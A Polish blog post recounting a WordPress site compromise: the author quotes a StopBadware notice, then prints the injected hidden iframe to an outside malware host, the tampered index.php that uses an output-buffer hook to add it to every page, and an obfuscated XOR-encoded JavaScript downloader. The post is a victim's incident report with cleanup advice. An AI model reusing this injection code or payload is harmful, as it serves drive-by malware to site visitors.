Kilka dni temu przez przypadek zauważyłem, że moja strona znalazła się na liście “podejrzanych” przez Google i Stopbadware.org…

Oto przykład:

Ciekawe… jest tego więcej… wystarczy zajrzeć tutaj

Okazało się, że kilka stron zostało przez google oznaczone jak powyżej (Ta witryna może wyrządzić szkody na Twoim komputerze).

A dokładniej:

Powod:

Google has found that some portion of blog.brodowski.net.pl/2007/ contains or links to badware or otherwise violates Google’s software guidelines.

Nie powiem, żeby ta sytuacja mnie nie zdenerwowała, gdyż zdenerwowała i to bardzo. Nadpisałem do google i stopbadware a teraz oczekuję na wyjaśnienie zaistniałej sytuacji. Jeden z linków prowadzi do księgi gości co wydaje się być jeszcze większą bzdurą (ktoś coś tam widział?).

Według google przyczyną takiego stanu rzeczy mogą być skrypty modyfikujące przeglądarkę (itp), złośliwe oprogramowanie na stronie lub linki do stron ze złośliwym oprogramowaniem. Pierwsze dwie opcje od razu odpadają gdyż po prostu nic takiego tu nie ma.

AKTUALIZACJA:

Dzisiaj dostałem odpowiedź z stopbadware.org i co się okazało:

According to our review of your website, your site contains a potentially damaging exploit. For example, the source code for http://blog.brodowski.net.pl/2007/
contains the following suspicious code:

<iframe src=”http://cds5fir.com/ld/dx/”
; width=100 height=80></iframe>

This type of code may allow parties other than yourself to load content onto user’s computers via your website. In such a case, simply visiting your site would cause users to become infected by malware, spyware, or other badware that is loaded from a remote site. In addition, the party that placed the code on your site could inject additional code onto your site with potentially undesireable consequences. Even if your site is not currently distributing badware (for example, if the site that the code is pointing to is not currently “live”), your site has the potential to become a distributor of badware at any time due to the exploit noted above. Because of this continuing danger, Google will not be removing the warning page for your site at this time.

We strongly recommend removing any code that is currently or has the potential to distribute badware and securing your site against future code injections. Otherwise, it is likely that your website will be hacked again. If your site has been hacked, then simply removing injected code from your site is not enough. You will also need to work with your hosting provider or website administrator to fix all security vulnerabilities associated with your site.

Po przeczytaniu tej wiadomości zacząłem grzebać i okazało się, że w kodzie faktycznie znajduje się taka linijka… Znajdowała się ona na samym końcu kodu co szybko doprowadziło mnie do pliku index.php…

Plik, który oryginalnie wygląda tak:

< ?
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>

Teraz wyglądał tak:

< ?
ob_start("phpfake");

/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
< ?
function phpfake($buffer)
{
$Exp='<div style="visibility:hidden"><iframe src="http://cds5fir.com/ld/dx/" width=100 height=80></iframe>';
return (ereg_replace("", "$Exp", $buffer));
}
?>

Drążąc temat dalej udało mi się ustalić, że nie jest to wina żadnego skryptu na serwerze (który dopuściłby atak tego typu), a najprawdopodobniej jest to wina trojana który zgarnął z któregoś komputera hasło do ftp-a i zmiany zostały wykonane właśnie z tego poziomu.

Jeżeli więc macie taki problem to jak najszybciej pozmieniajcie hasła do ftp-a (po oczyszczeniu plików) i zeskanujcie komputery które mogą gdzieś przechowywać wasze hasła.

Już wysłałem informacje do stopbadware i teraz czekam na zdjęcie mojego bloga z “czarnej listy”.

AKTUALIZACJA… kolejna.

Po dalszych poszukiwaniach najprawdopodobniej (99%) udało mi się znaleźć winnego tego zamieszania…

A naszym bohaterem jest: ADODB.Exploit.Gen

znany też jako: Trojan-Downloader.VBS.Psyme.ij (Kaspersky), VBS/Psyme (McAfee), Downloader (Symantec), HTML/ADODB.Exploit.Gen (Avira), Mal/Psyme-A (Sophos), VBS_PSYME.ABZ/

Data odkrycia: 18/07/2007
Typ: Exploit
Na wolności: Tak
Raportowanych infekcji: Mało
Potencjalna dystrybucja: Mała
Niszczący potencjał: Mały

Wirus ten jest odpowiedzialny za wykonywanie takiego kodu:

<script language="JavaScript">e = '0x00' + '6E';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp='';for(i=0;i<str1 .length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

Analizując…

Większość antywirusów ma tego trojana w swojej bazie danych, także ryzyko infekcji jest dość małe. Jeżeli chodzi o Linuksa to ryzyko zarażenia jest teoretycznie żadne, gdyż virus jest dedykowany systemowi MS. Jednakże zawsze warto podjąć środki bezpieczeństwa.
W moim przypadku najprawdopodobniej zainfekowany został komputer któregoś znajomego, który też korzysta z mojego serwera i używa Windowsa. Trojan ładnie zeskanował sobie wszystkie katalogi i zmienił zawartość każdego napotkanego pliku index.php. Na wszelki wypadek nie zaszkodzi sobie sprawdzić, czy zawartość waszego index.php jest prawidłowa.

Dodaj wpis do (Promuj Wpis):